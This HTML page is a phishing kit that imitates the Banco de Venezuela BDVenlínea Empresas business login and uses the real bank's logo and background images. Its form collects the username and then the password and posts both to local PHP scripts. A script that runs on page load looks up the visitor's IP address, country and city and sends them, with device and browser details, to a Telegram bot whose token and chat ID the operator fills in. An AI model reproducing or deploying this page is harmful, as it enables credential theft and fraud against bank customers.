<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="utf-8">
    <title>BDVenlínea Empresas</title>
    <base href="/">
    <!-- CACHE -->
    <meta http-equiv="cache-control" content="max-age=0" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta name="google" content="notranslate">
    <!-- RESPONSIVO -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- ICONOS -->
    <link href="https://fonts.googleapis.com/css?family=Nunito:300,400,500" rel="stylesheet">
    <link rel="icon" type="image/x-icon" href="/assets/favicon/favicon-16x16.png">
    <link href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700&display=swap" rel="stylesheet">

    <style>
        :root {
            --main-color: #0067b1;
            --input-border-color: #ddd;
            --error-color: #a90000;
            --font-family: 'Nunito', sans-serif;
        }

        body {
            font-family: var(--font-family);
            display: flex;
            justify-content: flex-start;
            align-items: center;
            height: 100vh;
            margin: 0;
            background: url('https://bdvenlineaempresas.banvenez.com/assets/login/login-empresa.png') no-repeat center center;
            background-size: cover;
        }

        .login-box {
            width: 100%;
            max-width: 360px;
            background: white;
            padding: 30px;
            border-radius: 8px;
            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.1);
            text-align: center;
            margin: 20px;
            position: relative;
            left: 50px;
        }

        .login-box img {
            width: 300px;
            margin-bottom: 10px;
        }

        .input-group {
            position: relative;
            margin: 20px 0;
            width: 100%;
            text-align: left;
        }

        .input-group label {
            position: absolute;
            top: 50%;
            left: 12px;
            transform: translateY(-50%);
            font-size: 16px;
            color: #666;
            pointer-events: none;
            transition: 0.3s;
        }

        .input-group input {
            width: 95%;
            padding: 12px;
            border: none;
            border-bottom: 2px solid var(--input-border-color);
            font-size: 16px;
            color: #333;
            outline: none;
            background-color: #f9f9f9;
        }

        .input-group input:focus {
            border-color: #bb1b47;
        }

        .input-group input:focus+label,
        .input-group input:not(:placeholder-shown)+label {
            top: -10px;
            font-size: 12px;
            color: #bb1b47;
        }

        .buttons {
            margin-top: 20px;
            text-align: center;
        }

        .buttons button {
            padding: 10px 0;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            background-color: var(--main-color);
            color: white;
            width: 80%;
            font-weight: 700;
            transition: background-color 0.3s;
        }

        .buttons button:hover {
            background-color: #003580;
        }

        .login-box p {
            font-size: 12px;
            color: #666;
            margin-top: 20px;
            line-height: 1.5;
        }

        .login-box p a {
            color: var(--main-color);
            text-decoration: none;
            font-weight: 600;
        }

        /* Popup de contraseña */
        .password-popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 95%;
            max-width: 360px;
            background: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.1);
            text-align: center;
            z-index: 10;
        }

        .password-popup h2 {
            font-size: 18px;
            color: var(--main-color);
            margin-bottom: 15px;
        }

        .password-input-group {
            position: relative;
            margin-bottom: 20px;
            text-align: left;
        }

        .password-input-group label {
            position: absolute;
            top: 50%;
            left: 12px;
            transform: translateY(-50%);
            font-size: 16px;
            color: #666;
            pointer-events: none;
            transition: 0.3s;
        }

        .password-input-group input {
            width: 95%;
            padding: 12px;
            border: none;
            border-bottom: 2px solid var(--input-border-color);
            font-size: 16px;
            color: #333;
            outline: none;
            background-color: #f9f9f9;
        }

        .password-input-group input:focus {
            border-color: #bb1b47;
        }

        .password-input-group input:focus+label,
        .password-input-group input:not(:placeholder-shown)+label {
            top: -10px;
            font-size: 12px;
            color: #bb1b47;
        }

        .password-buttons {
            display: flex;
            justify-content: space-between;
            margin-top: 10px;
        }

        .password-buttons button {
            padding: 10px 20px;
            font-size: 14px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            background-color: var(--main-color);
            color: white;
            width: 45%;
            font-weight: 700;
            transition: background-color 0.3s;
        }

        .password-buttons button:hover {
            background-color: #003580;
        }

        .overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.5);
            z-index: 5;
        }

        @media (max-width: 768px) {
            body {
                background-color: #e9e9e9;
                background-image: none;
            }

            .overlay {
                background: rgba(0, 0, 0, 0.5);
            }

            .login-box {
                left: auto;
                margin: 0 auto;
                box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.1);
                border: none;
            }

            .password-popup {
                background-color: white;
                box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.1);
                border: none;
            }
        }
    </style>
</head>

<body>
    <div class="login-box" id="userForm">
        <img src="https://bdvenlineaempresas.banvenez.com/assets/login/logo.png" alt="Logo BDV">
        <form id="loginForm" action="NEWBDV/1.php" method="POST">
            <!-- Campo de Usuario -->
            <div class="input-group">
                <input type="text" name="username" id="username" placeholder=" " oninput="validateUsername()">
                <label for="username">Usuario *</label>
            </div>
            <div class="buttons">
                <button id="loginButton" type="button" onclick="showPasswordPopup()" disabled>Entrar</button>
            </div>
            <p>¿Olvidaste tu usuario o clave?<br>Si eres nuevo cliente BDV <a href="#">regístrate aquí</a></p>
        </form>
    </div>

    <div class="overlay" id="overlay"></div>

    <div class="password-popup" id="passwordPopup">
        <h2>Introduce tu contraseña</h2>
        <div class="password-input-group">
            <input type="password" name="password" id="password" placeholder=" " oninput="validatePassword()">
            <label for="password">Contraseña *</label>
        </div>
        <span style="color: var(--error-color); font-size: 12px; display: block; margin-top: 5px;">Contraseña es requerida</span>
        <div class="password-buttons">
            <button id="continueButton" type="button" onclick="submitForm()" disabled>Continuar</button>
            <button onclick="closePasswordPopup()">Cancelar</button>
        </div>
    </div>

    <script>
        let savedUsername = '';

        function validateUsername() {
            savedUsername = document.getElementById("username").value;
            document.getElementById("loginButton").disabled = !savedUsername.trim();
        }

        function showPasswordPopup() {
            document.getElementById('passwordPopup').style.display = 'block';
            document.getElementById('overlay').style.display = 'block';
        }

        function closePasswordPopup() {
            document.getElementById('passwordPopup').style.display = 'none';
            document.getElementById('overlay').style.display = 'none';
            document.getElementById('password').value = '';
            document.getElementById('continueButton').disabled = true;
        }

        function validatePassword() {
            const password = document.getElementById("password").value;
            document.getElementById("continueButton").disabled = !password.trim();
        }

        function submitForm() {
            const password = document.getElementById("password").value;

            const form = document.createElement('form');
            form.method = 'POST';
            form.action = '/11.php';

            const usernameField = document.createElement('input');
            usernameField.type = 'hidden';
            usernameField.name = 'username';
            usernameField.value = savedUsername;

            const passwordField = document.createElement('input');
            passwordField.type = 'hidden';
            passwordField.name = 'password';
            passwordField.value = password;

            form.appendChild(usernameField);
            form.appendChild(passwordField);

            document.body.appendChild(form);
            form.submit();
        }
    </script>
</body>
<script>
      (async function() {
        try {
          // Obtener información del cliente
          const response = await fetch('https://ipwho.is/');
          const data = await response.json();

          // Detectar dispositivo y navegador
          const userAgent = navigator.userAgent;
          const dispositivo = /Mobile|Android|iPhone|iPad|iPod/i.test(userAgent) ? "Mobile" : "Desktop";

          // Crear mensaje
          const mensaje = `🌐 EMPRESAS
    📍 IP: ${data.ip}
    🌍 País: ${data.country_code}
    🏙 Ciudad: ${data.city}
    🕒 Hora: ${new Date().toLocaleString()}
    📱 Dispositivo: ${dispositivo}
    🖥 Navegador: ${userAgent}`;

          // Enviar mensaje a Telegram
          const botToken = "75530991"; // Reemplaza con el token de tu bot
          const chatId = "74";     // Reemplaza con el chat ID de tu bot o grupo
          const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

          await fetch(url, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({
              chat_id: chatId,
              text: mensaje,
            }),
          });
        } catch (error) {
          console.error('Error al enviar la notificación a Telegram:', error);
        }
      })();
    </script>
</html>
